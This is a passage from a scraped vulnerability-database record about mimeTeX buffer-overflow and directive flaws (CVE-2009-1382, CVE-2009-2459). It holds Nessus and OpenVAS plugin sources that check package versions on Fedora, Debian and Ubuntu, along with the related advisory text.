17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"mimetex-1.74-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:08:50", "description": " - Thu Oct 1 2009 Jorge Torres <jtorresh at gmail.com> -\n 1.71-1\n\n - Update to 1.71\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2010-07-01T00:00:00", "title": "Fedora 12 : mimetex-1.71-1.fc12 (2010-6546)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2010-07-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mimetex", "cpe:/o:fedoraproject:fedora:12"], "id": "FEDORA_2010-6546.NASL", "href": "https://www.tenable.com/plugins/nessus/47439", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-6546.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47439);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"FEDORA\", value:\"2010-6546\");\n\n script_name(english:\"Fedora 12 : mimetex-1.71-1.fc12 (2010-6546)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Oct 1 2009 Jorge Torres <jtorresh at gmail.com> -\n 1.71-1\n\n - Update to 1.71\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511049\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-April/039314.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5b128b3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"mimetex-1.71-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:51", "description": " - Fixes a buffer-overflow as detailed in #511049. -\n Updates to 1.7.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-11-05T00:00:00", "title": "Fedora 10 : mimetex-1.71-1.fc10 (2009-10225)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2009-11-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:mimetex"], "id": "FEDORA_2009-10225.NASL", "href": "https://www.tenable.com/plugins/nessus/42375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-10225.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42375);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"FEDORA\", value:\"2009-10225\");\n\n script_name(english:\"Fedora 10 : mimetex-1.71-1.fc10 (2009-10225)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fixes a buffer-overflow as detailed in #511049. -\n Updates to 1.7.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511049\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-November/030580.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4e4ae5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"mimetex-1.71-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:41", "description": "Several vulnerabilities have been discovered in mimetex, a lightweight\nalternative to MathML. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2009-1382\n Chris Evans and Damien Miller, discovered multiple\n stack-based buffer overflow. An attacker could execute\n arbitrary code via a TeX file with long picture, circle,\n input tags.\n\n - CVE-2009-2459\n Chris Evans discovered that mimeTeX contained certain\n directives that may be unsuitable for handling untrusted\n user input. A remote attacker can obtain sensitive\n information.", "edition": 26, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1917-1 : mimetex - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2010-02-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mimetex", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1917.NASL", "href": "https://www.tenable.com/plugins/nessus/44782", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1917. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44782);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"DSA\", value:\"1917\");\n\n script_name(english:\"Debian DSA-1917-1 : mimetex - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in mimetex, a lightweight\nalternative to MathML. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2009-1382\n Chris Evans and Damien Miller, discovered multiple\n stack-based buffer overflow. An attacker could execute\n arbitrary code via a TeX file with long picture, circle,\n input tags.\n\n - CVE-2009-2459\n Chris Evans discovered that mimeTeX contained certain\n directives that may be unsuitable for handling untrusted\n user input. A remote attacker can obtain sensitive\n information.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-2459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1917\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mimetex packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 1.50-1+etch1.\n\nDue to a bug in the archive system, the fix for the stable\ndistribution (lenny) will be released as version 1.50-1+lenny1 once it\nis available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"mimetex\", reference:\"1.50-1+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:45", "description": "Chris Evans discovered that mimeTeX incorrectly handled certain long\ntags. An attacker could exploit this with a crafted mimeTeX expression\nand cause a denial of service or possibly execute arbitrary code.\n(CVE-2009-1382)\n\nChris Evans discovered that mimeTeX contained certain directives that\nmay be unsuitable for handling untrusted user input. This update fixed\nthe issue by disabling the \\input and \\counter tags. (CVE-2009-2459).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-10-09T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : mimetex vulnerabilities (USN-844-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2009-10-09T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:mimetex", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-844-1.NASL", "href": "https://www.tenable.com/plugins/nessus/42079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-844-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42079);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_xref(name:\"USN\", value:\"844-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : mimetex vulnerabilities (USN-844-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans discovered that mimeTeX incorrectly handled certain long\ntags. An attacker could exploit this with a crafted mimeTeX expression\nand cause a denial of service or possibly execute arbitrary code.\n(CVE-2009-1382)\n\nChris Evans discovered that mimeTeX contained certain directives that\nmay be unsuitable for handling untrusted user input. This update fixed\nthe issue by disabling the \\input and \\counter tags. (CVE-2009-2459).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/844-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mimetex\", pkgver:\"1.50-1ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"mimetex\", pkgver:\"1.50-1ubuntu0.8.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"mimetex\", pkgver:\"1.50-1ubuntu0.9.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "Chris Evans discovered that mimeTeX incorrectly handled certain long tags. \nAn attacker could exploit this with a crafted mimeTeX expression and cause \na denial of service or possibly execute arbitrary code. (CVE-2009-1382)\n\nChris Evans discovered that mimeTeX contained certain directives that may \nbe unsuitable for handling untrusted user input. This update fixed the \nissue by disabling the \\input and \\counter tags. (CVE-2009-2459)", "edition": 5, "modified": "2009-10-08T00:00:00", "published": "2009-10-08T00:00:00", "id": "USN-844-1", "href": "https://ubuntu.com/security/notices/USN-844-1", "title": "mimeTeX vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10170.", "modified": "2017-07-10T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66196", "href": "http://plugins.openvas.org/nasl.php?oid=66196", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-10170 (mimetex)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10170.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10170 (mimetex)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\n- Fixes a buffer-overflow as detailed in #511049. - Updates to 1.7.\n\nChangeLog:\n\n* Thu Oct 1 2009 Jorge Torres - 1.71-1\n- Update to 1.71\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update mimetex' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10170\";\ntag_summary = \"The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10170.\";\n\n\n\nif(description)\n{\n script_id(66196);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-10170 (mimetex)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511049\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.71~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mimetex-debuginfo\", rpm:\"mimetex-debuginfo~1.71~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10225.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066192", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066192", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10225 (mimetex)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10225.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10225 (mimetex)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\n- Fixes a buffer-overflow as detailed in #511049. - Updates to 1.7.\n\nChangeLog:\n\n* Thu Oct 1 2009 Jorge Torres - 1.71-1\n- Update to 1.71\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update mimetex' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10225\";\ntag_summary = \"The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10225.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66192\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10225 (mimetex)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 